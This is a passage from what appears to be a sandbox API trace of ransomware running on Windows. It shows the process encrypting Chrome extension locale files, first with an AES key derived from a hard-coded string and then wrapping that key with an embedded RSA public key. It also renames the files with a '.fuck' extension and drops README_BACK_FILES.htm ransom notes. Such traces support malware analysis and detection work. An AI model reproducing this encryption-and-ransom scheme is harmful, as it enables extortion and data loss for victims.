pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.217] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.217] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.217] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.217] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.217] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.217] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.217] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.217] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.217] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.217] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.217] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.217] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.217] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.217] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.217] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.217] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.218] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.218] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.218] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.218] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.218] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.218] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.218] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.218] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.218] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.218] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.218] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x374, lpOverlapped=0x0) returned 1 [0263.218] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x374, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.218] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.219] CloseHandle (hObject=0x5d60) returned 1 [0263.219] CloseHandle (hObject=0x5d5c) returned 1 [0263.219] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), bFailIfExists=0) returned 1 [0263.223] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json", dwFileAttributes=0x0) returned 1 [0263.223] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.gsg")) returned 1 [0263.224] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.fuck")) returned 1 [0263.225] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.225] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0263.225] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.225] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.225] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.226] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\readme_back_files.htm")) returned 0xffffffff [0263.226] AreFileApisANSI () returned 1 [0263.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.226] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.227] GetFileType (hFile=0x5d64) returned 0x1 [0263.227] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.228] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.228] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.228] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.228] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.228] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.228] GetLastError () returned 0x0 [0263.228] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json")) returned 0x20 [0263.229] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json", dwFileAttributes=0x80) returned 1 [0263.230] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.230] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.231] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.232] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.233] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.233] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.233] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.233] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.233] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.234] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.234] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e73df0) returned 1 [0263.234] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73df0, dwCertEncodingType=0x1, pInfo=0x2ead1b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ead1e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ead1e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e480) returned 1 [0263.234] CryptEncrypt (in: hKey=0x2e7e480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.234] CryptEncrypt (in: hKey=0x2e7e480, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e74230*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e74230*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.234] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e74230*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e74230*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.235] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.249] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.249] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.257] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.257] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.257] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.257] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.257] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.257] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.257] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.257] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.257] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.257] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.257] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.258] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.258] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.258] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.258] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.258] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.258] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.258] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.258] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.258] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.258] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.258] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 